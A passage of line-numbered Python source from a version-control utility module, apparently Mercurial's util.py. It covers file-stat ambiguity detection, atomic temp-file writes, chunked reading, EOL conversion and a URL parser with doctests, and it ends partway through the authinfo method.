1950 1953 """help to exactly detect change of a file
1951 1954
1952 1955 'stat' attribute is result of 'os.stat()' if specified 'path'
1953 1956 exists. Otherwise, it is None. This can avoid preparative
1954 1957 'exists()' examination on client side of this class.
1955 1958 """
1956 1959 def __init__(self, stat):
1957 1960 self.stat = stat
1958 1961
1959 1962 @classmethod
1960 1963 def frompath(cls, path):
1961 1964 try:
1962 1965 stat = os.stat(path)
1963 1966 except OSError as err:
1964 1967 if err.errno != errno.ENOENT:
1965 1968 raise
1966 1969 stat = None
1967 1970 return cls(stat)
1968 1971
1969 1972 @classmethod
1970 1973 def fromfp(cls, fp):
1971 1974 stat = os.fstat(fp.fileno())
1972 1975 return cls(stat)
1973 1976
1974 1977 __hash__ = object.__hash__
1975 1978
1976 1979 def __eq__(self, old):
1977 1980 try:
1978 1981 # if ambiguity between stat of new and old file is
1979 1982 # avoided, comparison of size, ctime and mtime is enough
1980 1983 # to exactly detect change of a file regardless of platform
1981 1984 return (self.stat.st_size == old.stat.st_size and
1982 1985 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1983 1986 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1984 1987 except AttributeError:
1985 1988 pass
1986 1989 try:
1987 1990 return self.stat is None and old.stat is None
1988 1991 except AttributeError:
1989 1992 return False
1990 1993
1991 1994 def isambig(self, old):
1992 1995 """Examine whether new (= self) stat is ambiguous against old one
1993 1996
1994 1997 "S[N]" below means stat of a file at N-th change:
1995 1998
1996 1999 - S[n-1].ctime < S[n].ctime: can detect change of a file
1997 2000 - S[n-1].ctime == S[n].ctime
1998 2001 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1999 2002 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2000 2003 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2001 2004 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2002 2005
2003 2006 Case (*2) above means that a file was changed twice or more at
2004 2007 same time in sec (= S[n-1].ctime), and comparison of timestamp
2005 2008 is ambiguous.
2006 2009
2007 2010 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2008 2011 timestamp is ambiguous".
2009 2012
2010 2013 But advancing mtime only in case (*2) doesn't work as
2011 2014 expected, because naturally advanced S[n].mtime in case (*1)
2012 2015 might be equal to manually advanced S[n-1 or earlier].mtime.
2013 2016
2014 2017 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2015 2018 treated as ambiguous regardless of mtime, to avoid overlooking
2016 2019 by confliction between such mtime.
2017 2020
2018 2021 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2019 2022 S[n].mtime", even if size of a file isn't changed.
2020 2023 """
2021 2024 try:
2022 2025 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2023 2026 except AttributeError:
2024 2027 return False
2025 2028
2026 2029 def avoidambig(self, path, old):
2027 2030 """Change file stat of specified path to avoid ambiguity
2028 2031
2029 2032 'old' should be previous filestat of 'path'.
2030 2033
2031 2034 This skips avoiding ambiguity, if a process doesn't have
2032 2035 appropriate privileges for 'path'. This returns False in this
2033 2036 case.
2034 2037
2035 2038 Otherwise, this returns True, as "ambiguity is avoided".
2036 2039 """
2037 2040 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2038 2041 try:
2039 2042 os.utime(path, (advanced, advanced))
2040 2043 except OSError as inst:
2041 2044 if inst.errno == errno.EPERM:
2042 2045 # utime() on the file created by another user causes EPERM,
2043 2046 # if a process doesn't have appropriate privileges
2044 2047 return False
2045 2048 raise
2046 2049 return True
2047 2050
2048 2051 def __ne__(self, other):
2049 2052 return not self == other
2050 2053
2051 2054 class atomictempfile(object):
2052 2055 '''writable file object that atomically updates a file
2053 2056
2054 2057 All writes will go to a temporary copy of the original file. Call
2055 2058 close() when you are done writing, and atomictempfile will rename
2056 2059 the temporary copy to the original name, making the changes
2057 2060 visible. If the object is destroyed without being closed, all your
2058 2061 writes are discarded.
2059 2062
2060 2063 checkambig argument of constructor is used with filestat, and is
2061 2064 useful only if target file is guarded by any lock (e.g. repo.lock
2062 2065 or repo.wlock).
2063 2066 '''
2064 2067 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2065 2068 self.__name = name # permanent name
2066 2069 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2067 2070 createmode=createmode)
2068 2071 self._fp = posixfile(self._tempname, mode)
2069 2072 self._checkambig = checkambig
2070 2073
2071 2074 # delegated methods
2072 2075 self.read = self._fp.read
2073 2076 self.write = self._fp.write
2074 2077 self.seek = self._fp.seek
2075 2078 self.tell = self._fp.tell
2076 2079 self.fileno = self._fp.fileno
2077 2080
2078 2081 def close(self):
2079 2082 if not self._fp.closed:
2080 2083 self._fp.close()
2081 2084 filename = localpath(self.__name)
2082 2085 oldstat = self._checkambig and filestat.frompath(filename)
2083 2086 if oldstat and oldstat.stat:
2084 2087 rename(self._tempname, filename)
2085 2088 newstat = filestat.frompath(filename)
2086 2089 if newstat.isambig(oldstat):
2087 2090 # stat of changed file is ambiguous to original one
2088 2091 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2089 2092 os.utime(filename, (advanced, advanced))
2090 2093 else:
2091 2094 rename(self._tempname, filename)
2092 2095
2093 2096 def discard(self):
2094 2097 if not self._fp.closed:
2095 2098 try:
2096 2099 os.unlink(self._tempname)
2097 2100 except OSError:
2098 2101 pass
2099 2102 self._fp.close()
2100 2103
2101 2104 def __del__(self):
2102 2105 if safehasattr(self, '_fp'): # constructor actually did something
2103 2106 self.discard()
2104 2107
2105 2108 def __enter__(self):
2106 2109 return self
2107 2110
2108 2111 def __exit__(self, exctype, excvalue, traceback):
2109 2112 if exctype is not None:
2110 2113 self.discard()
2111 2114 else:
2112 2115 self.close()
2113 2116
2114 2117 def unlinkpath(f, ignoremissing=False, rmdir=True):
2115 2118 """unlink and remove the directory if it is empty"""
2116 2119 if ignoremissing:
2117 2120 tryunlink(f)
2118 2121 else:
2119 2122 unlink(f)
2120 2123 if rmdir:
2121 2124 # try removing directories that might now be empty
2122 2125 try:
2123 2126 removedirs(os.path.dirname(f))
2124 2127 except OSError:
2125 2128 pass
2126 2129
2127 2130 def tryunlink(f):
2128 2131 """Attempt to remove a file, ignoring ENOENT errors."""
2129 2132 try:
2130 2133 unlink(f)
2131 2134 except OSError as e:
2132 2135 if e.errno != errno.ENOENT:
2133 2136 raise
2134 2137
2135 2138 def makedirs(name, mode=None, notindexed=False):
2136 2139 """recursive directory creation with parent mode inheritance
2137 2140
2138 2141 Newly created directories are marked as "not to be indexed by
2139 2142 the content indexing service", if ``notindexed`` is specified
2140 2143 for "write" mode access.
2141 2144 """
2142 2145 try:
2143 2146 makedir(name, notindexed)
2144 2147 except OSError as err:
2145 2148 if err.errno == errno.EEXIST:
2146 2149 return
2147 2150 if err.errno != errno.ENOENT or not name:
2148 2151 raise
2149 2152 parent = os.path.dirname(os.path.abspath(name))
2150 2153 if parent == name:
2151 2154 raise
2152 2155 makedirs(parent, mode, notindexed)
2153 2156 try:
2154 2157 makedir(name, notindexed)
2155 2158 except OSError as err:
2156 2159 # Catch EEXIST to handle races
2157 2160 if err.errno == errno.EEXIST:
2158 2161 return
2159 2162 raise
2160 2163 if mode is not None:
2161 2164 os.chmod(name, mode)
2162 2165
2163 2166 def readfile(path):
2164 2167 with open(path, 'rb') as fp:
2165 2168 return fp.read()
2166 2169
2167 2170 def writefile(path, text):
2168 2171 with open(path, 'wb') as fp:
2169 2172 fp.write(text)
2170 2173
2171 2174 def appendfile(path, text):
2172 2175 with open(path, 'ab') as fp:
2173 2176 fp.write(text)
2174 2177
2175 2178 class chunkbuffer(object):
2176 2179 """Allow arbitrary sized chunks of data to be efficiently read from an
2177 2180 iterator over chunks of arbitrary size."""
2178 2181
2179 2182 def __init__(self, in_iter):
2180 2183 """in_iter is the iterator that's iterating over the input chunks."""
2181 2184 def splitbig(chunks):
2182 2185 for chunk in chunks:
2183 2186 if len(chunk) > 2**20:
2184 2187 pos = 0
2185 2188 while pos < len(chunk):
2186 2189 end = pos + 2 ** 18
2187 2190 yield chunk[pos:end]
2188 2191 pos = end
2189 2192 else:
2190 2193 yield chunk
2191 2194 self.iter = splitbig(in_iter)
2192 2195 self._queue = collections.deque()
2193 2196 self._chunkoffset = 0
2194 2197
2195 2198 def read(self, l=None):
2196 2199 """Read L bytes of data from the iterator of chunks of data.
2197 2200 Returns less than L bytes if the iterator runs dry.
2198 2201
2199 2202 If size parameter is omitted, read everything"""
2200 2203 if l is None:
2201 2204 return ''.join(self.iter)
2202 2205
2203 2206 left = l
2204 2207 buf = []
2205 2208 queue = self._queue
2206 2209 while left > 0:
2207 2210 # refill the queue
2208 2211 if not queue:
2209 2212 target = 2**18
2210 2213 for chunk in self.iter:
2211 2214 queue.append(chunk)
2212 2215 target -= len(chunk)
2213 2216 if target <= 0:
2214 2217 break
2215 2218 if not queue:
2216 2219 break
2217 2220
2218 2221 # The easy way to do this would be to queue.popleft(), modify the
2219 2222 # chunk (if necessary), then queue.appendleft(). However, for cases
2220 2223 # where we read partial chunk content, this incurs 2 dequeue
2221 2224 # mutations and creates a new str for the remaining chunk in the
2222 2225 # queue. Our code below avoids this overhead.
2223 2226
2224 2227 chunk = queue[0]
2225 2228 chunkl = len(chunk)
2226 2229 offset = self._chunkoffset
2227 2230
2228 2231 # Use full chunk.
2229 2232 if offset == 0 and left >= chunkl:
2230 2233 left -= chunkl
2231 2234 queue.popleft()
2232 2235 buf.append(chunk)
2233 2236 # self._chunkoffset remains at 0.
2234 2237 continue
2235 2238
2236 2239 chunkremaining = chunkl - offset
2237 2240
2238 2241 # Use all of unconsumed part of chunk.
2239 2242 if left >= chunkremaining:
2240 2243 left -= chunkremaining
2241 2244 queue.popleft()
2242 2245 # offset == 0 is enabled by block above, so this won't merely
2243 2246 # copy via ``chunk[0:]``.
2244 2247 buf.append(chunk[offset:])
2245 2248 self._chunkoffset = 0
2246 2249
2247 2250 # Partial chunk needed.
2248 2251 else:
2249 2252 buf.append(chunk[offset:offset + left])
2250 2253 self._chunkoffset += left
2251 2254 left -= chunkremaining
2252 2255
2253 2256 return ''.join(buf)
2254 2257
2255 2258 def filechunkiter(f, size=131072, limit=None):
2256 2259 """Create a generator that produces the data in the file size
2257 2260 (default 131072) bytes at a time, up to optional limit (default is
2258 2261 to read all data). Chunks may be less than size bytes if the
2259 2262 chunk is the last chunk in the file, or the file is a socket or
2260 2263 some other type of file that sometimes reads less data than is
2261 2264 requested."""
2262 2265 assert size >= 0
2263 2266 assert limit is None or limit >= 0
2264 2267 while True:
2265 2268 if limit is None:
2266 2269 nbytes = size
2267 2270 else:
2268 2271 nbytes = min(limit, size)
2269 2272 s = nbytes and f.read(nbytes)
2270 2273 if not s:
2271 2274 break
2272 2275 if limit:
2273 2276 limit -= len(s)
2274 2277 yield s
2275 2278
2276 2279 class cappedreader(object):
2277 2280 """A file object proxy that allows reading up to N bytes.
2278 2281
2279 2282 Given a source file object, instances of this type allow reading up to
2280 2283 N bytes from that source file object. Attempts to read past the allowed
2281 2284 limit are treated as EOF.
2282 2285
2283 2286 It is assumed that I/O is not performed on the original file object
2284 2287 in addition to I/O that is performed by this instance. If there is,
2285 2288 state tracking will get out of sync and unexpected results will ensue.
2286 2289 """
2287 2290 def __init__(self, fh, limit):
2288 2291 """Allow reading up to <limit> bytes from <fh>."""
2289 2292 self._fh = fh
2290 2293 self._left = limit
2291 2294
2292 2295 def read(self, n=-1):
2293 2296 if not self._left:
2294 2297 return b''
2295 2298
2296 2299 if n < 0:
2297 2300 n = self._left
2298 2301
2299 2302 data = self._fh.read(min(n, self._left))
2300 2303 self._left -= len(data)
2301 2304 assert self._left >= 0
2302 2305
2303 2306 return data
2304 2307
2305 2308 def readinto(self, b):
2306 2309 res = self.read(len(b))
2307 2310 if res is None:
2308 2311 return None
2309 2312
2310 2313 b[0:len(res)] = res
2311 2314 return len(res)
2312 2315
2313 2316 def unitcountfn(*unittable):
2314 2317 '''return a function that renders a readable count of some quantity'''
2315 2318
2316 2319 def go(count):
2317 2320 for multiplier, divisor, format in unittable:
2318 2321 if abs(count) >= divisor * multiplier:
2319 2322 return format % (count / float(divisor))
2320 2323 return unittable[-1][2] % count
2321 2324
2322 2325 return go
2323 2326
2324 2327 def processlinerange(fromline, toline):
2325 2328 """Check that linerange <fromline>:<toline> makes sense and return a
2326 2329 0-based range.
2327 2330
2328 2331 >>> processlinerange(10, 20)
2329 2332 (9, 20)
2330 2333 >>> processlinerange(2, 1)
2331 2334 Traceback (most recent call last):
2332 2335 ...
2333 2336 ParseError: line range must be positive
2334 2337 >>> processlinerange(0, 5)
2335 2338 Traceback (most recent call last):
2336 2339 ...
2337 2340 ParseError: fromline must be strictly positive
2338 2341 """
2339 2342 if toline - fromline < 0:
2340 2343 raise error.ParseError(_("line range must be positive"))
2341 2344 if fromline < 1:
2342 2345 raise error.ParseError(_("fromline must be strictly positive"))
2343 2346 return fromline - 1, toline
2344 2347
2345 2348 bytecount = unitcountfn(
2346 2349 (100, 1 << 30, _('%.0f GB')),
2347 2350 (10, 1 << 30, _('%.1f GB')),
2348 2351 (1, 1 << 30, _('%.2f GB')),
2349 2352 (100, 1 << 20, _('%.0f MB')),
2350 2353 (10, 1 << 20, _('%.1f MB')),
2351 2354 (1, 1 << 20, _('%.2f MB')),
2352 2355 (100, 1 << 10, _('%.0f KB')),
2353 2356 (10, 1 << 10, _('%.1f KB')),
2354 2357 (1, 1 << 10, _('%.2f KB')),
2355 2358 (1, 1, _('%.0f bytes')),
2356 2359 )
2357 2360
2358 2361 class transformingwriter(object):
2359 2362 """Writable file wrapper to transform data by function"""
2360 2363
2361 2364 def __init__(self, fp, encode):
2362 2365 self._fp = fp
2363 2366 self._encode = encode
2364 2367
2365 2368 def close(self):
2366 2369 self._fp.close()
2367 2370
2368 2371 def flush(self):
2369 2372 self._fp.flush()
2370 2373
2371 2374 def write(self, data):
2372 2375 return self._fp.write(self._encode(data))
2373 2376
2374 2377 # Matches a single EOL which can either be a CRLF where repeated CR
2375 2378 # are removed or a LF. We do not care about old Macintosh files, so a
2376 2379 # stray CR is an error.
2377 2380 _eolre = remod.compile(br'\r*\n')
2378 2381
2379 2382 def tolf(s):
2380 2383 return _eolre.sub('\n', s)
2381 2384
2382 2385 def tocrlf(s):
2383 2386 return _eolre.sub('\r\n', s)
2384 2387
2385 2388 def _crlfwriter(fp):
2386 2389 return transformingwriter(fp, tocrlf)
2387 2390
2388 2391 if pycompat.oslinesep == '\r\n':
2389 2392 tonativeeol = tocrlf
2390 2393 fromnativeeol = tolf
2391 2394 nativeeolwriter = _crlfwriter
2392 2395 else:
2393 2396 tonativeeol = pycompat.identity
2394 2397 fromnativeeol = pycompat.identity
2395 2398 nativeeolwriter = pycompat.identity
2396 2399
2397 2400 if (pyplatform.python_implementation() == 'CPython' and
2398 2401 sys.version_info < (3, 0)):
2399 2402 # There is an issue in CPython that some IO methods do not handle EINTR
2400 2403 # correctly. The following table shows what CPython version (and functions)
2401 2404 # are affected (buggy: has the EINTR bug, okay: otherwise):
2402 2405 #
2403 2406 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2404 2407 # --------------------------------------------------
2405 2408 # fp.__iter__ | buggy | buggy | okay
2406 2409 # fp.read* | buggy | okay [1] | okay
2407 2410 #
2408 2411 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2409 2412 #
2410 2413 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2411 2414 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2412 2415 #
2413 2416 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2414 2417 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2415 2418 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2416 2419 # fp.__iter__ but not other fp.read* methods.
2417 2420 #
2418 2421 # On modern systems like Linux, the "read" syscall cannot be interrupted
2419 2422 # when reading "fast" files like on-disk files. So the EINTR issue only
2420 2423 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2421 2424 # files approximately as "fast" files and use the fast (unsafe) code path,
2422 2425 # to minimize the performance impact.
2423 2426 if sys.version_info >= (2, 7, 4):
2424 2427 # fp.readline deals with EINTR correctly, use it as a workaround.
2425 2428 def _safeiterfile(fp):
2426 2429 return iter(fp.readline, '')
2427 2430 else:
2428 2431 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2429 2432 # note: this may block longer than necessary because of bufsize.
2430 2433 def _safeiterfile(fp, bufsize=4096):
2431 2434 fd = fp.fileno()
2432 2435 line = ''
2433 2436 while True:
2434 2437 try:
2435 2438 buf = os.read(fd, bufsize)
2436 2439 except OSError as ex:
2437 2440 # os.read only raises EINTR before any data is read
2438 2441 if ex.errno == errno.EINTR:
2439 2442 continue
2440 2443 else:
2441 2444 raise
2442 2445 line += buf
2443 2446 if '\n' in buf:
2444 2447 splitted = line.splitlines(True)
2445 2448 line = ''
2446 2449 for l in splitted:
2447 2450 if l[-1] == '\n':
2448 2451 yield l
2449 2452 else:
2450 2453 line = l
2451 2454 if not buf:
2452 2455 break
2453 2456 if line:
2454 2457 yield line
2455 2458
2456 2459 def iterfile(fp):
2457 2460 fastpath = True
2458 2461 if type(fp) is file:
2459 2462 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2460 2463 if fastpath:
2461 2464 return fp
2462 2465 else:
2463 2466 return _safeiterfile(fp)
2464 2467 else:
2465 2468 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2466 2469 def iterfile(fp):
2467 2470 return fp
2468 2471
2469 2472 def iterlines(iterator):
2470 2473 for chunk in iterator:
2471 2474 for line in chunk.splitlines():
2472 2475 yield line
2473 2476
2474 2477 def expandpath(path):
2475 2478 return os.path.expanduser(os.path.expandvars(path))
2476 2479
2477 2480 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2478 2481 """Return the result of interpolating items in the mapping into string s.
2479 2482
2480 2483 prefix is a single character string, or a two character string with
2481 2484 a backslash as the first character if the prefix needs to be escaped in
2482 2485 a regular expression.
2483 2486
2484 2487 fn is an optional function that will be applied to the replacement text
2485 2488 just before replacement.
2486 2489
2487 2490 escape_prefix is an optional flag that allows using doubled prefix for
2488 2491 its escaping.
2489 2492 """
2490 2493 fn = fn or (lambda s: s)
2491 2494 patterns = '|'.join(mapping.keys())
2492 2495 if escape_prefix:
2493 2496 patterns += '|' + prefix
2494 2497 if len(prefix) > 1:
2495 2498 prefix_char = prefix[1:]
2496 2499 else:
2497 2500 prefix_char = prefix
2498 2501 mapping[prefix_char] = prefix_char
2499 2502 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2500 2503 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2501 2504
2502 2505 def getport(port):
2503 2506 """Return the port for a given network service.
2504 2507
2505 2508 If port is an integer, it's returned as is. If it's a string, it's
2506 2509 looked up using socket.getservbyname(). If there's no matching
2507 2510 service, error.Abort is raised.
2508 2511 """
2509 2512 try:
2510 2513 return int(port)
2511 2514 except ValueError:
2512 2515 pass
2513 2516
2514 2517 try:
2515 2518 return socket.getservbyname(pycompat.sysstr(port))
2516 2519 except socket.error:
2517 2520 raise error.Abort(_("no port number associated with service '%s'")
2518 2521 % port)
2519 2522
2520 2523 class url(object):
2521 2524 r"""Reliable URL parser.
2522 2525
2523 2526 This parses URLs and provides attributes for the following
2524 2527 components:
2525 2528
2526 2529 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2527 2530
2528 2531 Missing components are set to None. The only exception is
2529 2532 fragment, which is set to '' if present but empty.
2530 2533
2531 2534 If parsefragment is False, fragment is included in query. If
2532 2535 parsequery is False, query is included in path. If both are
2533 2536 False, both fragment and query are included in path.
2534 2537
2535 2538 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2536 2539
2537 2540 Note that for backward compatibility reasons, bundle URLs do not
2538 2541 take host names. That means 'bundle://../' has a path of '../'.
2539 2542
2540 2543 Examples:
2541 2544
2542 2545 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2543 2546 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2544 2547 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2545 2548 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2546 2549 >>> url(b'file:///home/joe/repo')
2547 2550 <url scheme: 'file', path: '/home/joe/repo'>
2548 2551 >>> url(b'file:///c:/temp/foo/')
2549 2552 <url scheme: 'file', path: 'c:/temp/foo/'>
2550 2553 >>> url(b'bundle:foo')
2551 2554 <url scheme: 'bundle', path: 'foo'>
2552 2555 >>> url(b'bundle://../foo')
2553 2556 <url scheme: 'bundle', path: '../foo'>
2554 2557 >>> url(br'c:\foo\bar')
2555 2558 <url path: 'c:\\foo\\bar'>
2556 2559 >>> url(br'\\blah\blah\blah')
2557 2560 <url path: '\\\\blah\\blah\\blah'>
2558 2561 >>> url(br'\\blah\blah\blah#baz')
2559 2562 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2560 2563 >>> url(br'file:///C:\users\me')
2561 2564 <url scheme: 'file', path: 'C:\\users\\me'>
2562 2565
2563 2566 Authentication credentials:
2564 2567
2565 2568 >>> url(b'ssh://joe:xyz@x/repo')
2566 2569 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2567 2570 >>> url(b'ssh://joe@x/repo')
2568 2571 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2569 2572
2570 2573 Query strings and fragments:
2571 2574
2572 2575 >>> url(b'http://host/a?b#c')
2573 2576 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2574 2577 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2575 2578 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2576 2579
2577 2580 Empty path:
2578 2581
2579 2582 >>> url(b'')
2580 2583 <url path: ''>
2581 2584 >>> url(b'#a')
2582 2585 <url path: '', fragment: 'a'>
2583 2586 >>> url(b'http://host/')
2584 2587 <url scheme: 'http', host: 'host', path: ''>
2585 2588 >>> url(b'http://host/#a')
2586 2589 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2587 2590
2588 2591 Only scheme:
2589 2592
2590 2593 >>> url(b'http:')
2591 2594 <url scheme: 'http'>
2592 2595 """
2593 2596
2594 2597 _safechars = "!~*'()+"
2595 2598 _safepchars = "/!~*'()+:\\"
2596 2599 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2597 2600
2598 2601 def __init__(self, path, parsequery=True, parsefragment=True):
2599 2602 # We slowly chomp away at path until we have only the path left
2600 2603 self.scheme = self.user = self.passwd = self.host = None
2601 2604 self.port = self.path = self.query = self.fragment = None
2602 2605 self._localpath = True
2603 2606 self._hostport = ''
2604 2607 self._origpath = path
2605 2608
2606 2609 if parsefragment and '#' in path:
2607 2610 path, self.fragment = path.split('#', 1)
2608 2611
2609 2612 # special case for Windows drive letters and UNC paths
2610 2613 if hasdriveletter(path) or path.startswith('\\\\'):
2611 2614 self.path = path
2612 2615 return
2613 2616
2614 2617 # For compatibility reasons, we can't handle bundle paths as
2615 2618 # normal URLS
2616 2619 if path.startswith('bundle:'):
2617 2620 self.scheme = 'bundle'
2618 2621 path = path[7:]
2619 2622 if path.startswith('//'):
2620 2623 path = path[2:]
2621 2624 self.path = path
2622 2625 return
2623 2626
2624 2627 if self._matchscheme(path):
2625 2628 parts = path.split(':', 1)
2626 2629 if parts[0]:
2627 2630 self.scheme, path = parts
2628 2631 self._localpath = False
2629 2632
2630 2633 if not path:
2631 2634 path = None
2632 2635 if self._localpath:
2633 2636 self.path = ''
2634 2637 return
2635 2638 else:
2636 2639 if self._localpath:
2637 2640 self.path = path
2638 2641 return
2639 2642
2640 2643 if parsequery and '?' in path:
2641 2644 path, self.query = path.split('?', 1)
2642 2645 if not path:
2643 2646 path = None
2644 2647 if not self.query:
2645 2648 self.query = None
2646 2649
2647 2650 # // is required to specify a host/authority
2648 2651 if path and path.startswith('//'):
2649 2652 parts = path[2:].split('/', 1)
2650 2653 if len(parts) > 1:
2651 2654 self.host, path = parts
2652 2655 else:
2653 2656 self.host = parts[0]
2654 2657 path = None
2655 2658 if not self.host:
2656 2659 self.host = None
2657 2660 # path of file:///d is /d
2658 2661 # path of file:///d:/ is d:/, not /d:/
2659 2662 if path and not hasdriveletter(path):
2660 2663 path = '/' + path
2661 2664
2662 2665 if self.host and '@' in self.host:
2663 2666 self.user, self.host = self.host.rsplit('@', 1)
2664 2667 if ':' in self.user:
2665 2668 self.user, self.passwd = self.user.split(':', 1)
2666 2669 if not self.host:
2667 2670 self.host = None
2668 2671
2669 2672 # Don't split on colons in IPv6 addresses without ports
2670 2673 if (self.host and ':' in self.host and
2671 2674 not (self.host.startswith('[') and self.host.endswith(']'))):
2672 2675 self._hostport = self.host
2673 2676 self.host, self.port = self.host.rsplit(':', 1)
2674 2677 if not self.host:
2675 2678 self.host = None
2676 2679
2677 2680 if (self.host and self.scheme == 'file' and
2678 2681 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2679 2682 raise error.Abort(_('file:// URLs can only refer to localhost'))
2680 2683
2681 2684 self.path = path
2682 2685
2683 2686 # leave the query string escaped
2684 2687 for a in ('user', 'passwd', 'host', 'port',
2685 2688 'path', 'fragment'):
2686 2689 v = getattr(self, a)
2687 2690 if v is not None:
2688 2691 setattr(self, a, urlreq.unquote(v))
2689 2692
2690 2693 @encoding.strmethod
2691 2694 def __repr__(self):
2692 2695 attrs = []
2693 2696 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2694 2697 'query', 'fragment'):
2695 2698 v = getattr(self, a)
2696 2699 if v is not None:
2697 2700 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2698 2701 return '<url %s>' % ', '.join(attrs)
2699 2702
2700 2703 def __bytes__(self):
2701 2704 r"""Join the URL's components back into a URL string.
2702 2705
2703 2706 Examples:
2704 2707
2705 2708 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2706 2709 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2707 2710 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2708 2711 'http://user:pw@host:80/?foo=bar&baz=42'
2709 2712 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2710 2713 'http://user:pw@host:80/?foo=bar%3dbaz'
2711 2714 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2712 2715 'ssh://user:pw@[::1]:2200//home/joe#'
2713 2716 >>> bytes(url(b'http://localhost:80//'))
2714 2717 'http://localhost:80//'
2715 2718 >>> bytes(url(b'http://localhost:80/'))
2716 2719 'http://localhost:80/'
2717 2720 >>> bytes(url(b'http://localhost:80'))
2718 2721 'http://localhost:80/'
2719 2722 >>> bytes(url(b'bundle:foo'))
2720 2723 'bundle:foo'
2721 2724 >>> bytes(url(b'bundle://../foo'))
2722 2725 'bundle:../foo'
2723 2726 >>> bytes(url(b'path'))
2724 2727 'path'
2725 2728 >>> bytes(url(b'file:///tmp/foo/bar'))
2726 2729 'file:///tmp/foo/bar'
2727 2730 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2728 2731 'file:///c:/tmp/foo/bar'
2729 2732 >>> print(url(br'bundle:foo\bar'))
2730 2733 bundle:foo\bar
2731 2734 >>> print(url(br'file:///D:\data\hg'))
2732 2735 file:///D:\data\hg
2733 2736 """
2734 2737 if self._localpath:
2735 2738 s = self.path
2736 2739 if self.scheme == 'bundle':
2737 2740 s = 'bundle:' + s
2738 2741 if self.fragment:
2739 2742 s += '#' + self.fragment
2740 2743 return s
2741 2744
2742 2745 s = self.scheme + ':'
2743 2746 if self.user or self.passwd or self.host:
2744 2747 s += '//'
2745 2748 elif self.scheme and (not self.path or self.path.startswith('/')
2746 2749 or hasdriveletter(self.path)):
2747 2750 s += '//'
2748 2751 if hasdriveletter(self.path):
2749 2752 s += '/'
2750 2753 if self.user:
2751 2754 s += urlreq.quote(self.user, safe=self._safechars)
2752 2755 if self.passwd:
2753 2756 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2754 2757 if self.user or self.passwd:
2755 2758 s += '@'
2756 2759 if self.host:
2757 2760 if not (self.host.startswith('[') and self.host.endswith(']')):
2758 2761 s += urlreq.quote(self.host)
2759 2762 else:
2760 2763 s += self.host
2761 2764 if self.port:
2762 2765 s += ':' + urlreq.quote(self.port)
2763 2766 if self.host:
2764 2767 s += '/'
2765 2768 if self.path:
2766 2769 # TODO: similar to the query string, we should not unescape the
2767 2770 # path when we store it, the path might contain '%2f' = '/',
2768 2771 # which we should *not* escape.
2769 2772 s += urlreq.quote(self.path, safe=self._safepchars)
2770 2773 if self.query:
2771 2774 # we store the query in escaped form.
2772 2775 s += '?' + self.query
2773 2776 if self.fragment is not None:
2774 2777 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2775 2778 return s
2776 2779
2777 2780 __str__ = encoding.strmethod(__bytes__)
2778 2781
2779 2782 def authinfo(self):
2780 2783 user, passwd = self.user, self.passwd
2781 2784 try:
2782 2785 self.user, self.passwd = None, None
2783 2786 s = bytes(self)
2784 2787 finally:
2785 2788 self.user, self.passwd = user, passwd
2786 2789 if not self.user:
2787 2790 return (s, None)
2788 2791 # authinfo[1] is passed to urllib2 password manager, and its
2789 2792 # URIs must not contain credentials. The host is passed in the
2790 2793 # URIs list because Python < 2.4.3 uses only that to search for
2791 2794 # a password.
